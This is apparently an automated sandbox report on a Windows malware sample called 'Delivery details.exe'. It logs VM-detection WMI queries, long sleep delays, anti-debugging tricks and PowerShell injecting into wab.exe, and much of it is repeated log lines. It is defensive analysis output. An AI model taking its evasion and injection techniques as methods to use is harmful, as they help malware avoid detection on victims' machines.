Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Delivery details.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 2A80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 211A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 21060000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597655	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596326	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595858	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595188	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594949	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594719	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594609	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594500	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5442	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3703	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 9086	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 726	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1480	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -23058430092136925s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -599344s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -598891s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -598344s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -597891s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -597766s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -597655s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -597531s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -597422s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -597312s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -597203s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -597094s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -596984s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -596875s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -596765s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -596656s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -596547s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -596437s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -596326s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -596203s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -596094s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -595969s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -595858s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -595734s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -595625s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -595516s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -595406s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -595297s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -595188s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -595063s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -594949s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -594828s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -594719s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -594609s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828	Thread sleep time: -594500s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Delivery details.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\Delivery details.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Delivery details.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Delivery details.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Delivery details.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Delivery details.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Delivery details.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Delivery details.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Delivery details.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Delivery details.exe	Code function: 0_2_004066F3 FindFirstFileW,FindClose,	0_2_004066F3
Source: C:\Users\user\Desktop\Delivery details.exe	Code function: 0_2_00405ABE CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405ABE
Source: C:\Users\user\Desktop\Delivery details.exe	Code function: 0_2_00402862 FindFirstFileW,	0_2_00402862

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597655	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596326	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595858	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595188	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594949	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594719	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594609	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594500	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\akroterion\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\akroterion\archmugwump\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior

Source: wab.exe, 00000006.00000002.3268060229.0000000005958000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3268060229.00000000059B9000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Delivery details.exe	API call chain: ExitProcess graph end node			graph_0-3592
Source: C:\Users\user\Desktop\Delivery details.exe	API call chain: ExitProcess graph end node			graph_0-3748

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 6_2_02A5D044 LdrInitializeThunk,LdrInitializeThunk,

6_2_02A5D044

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4060000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2A8F8D8			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c "set /A 1^^0			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
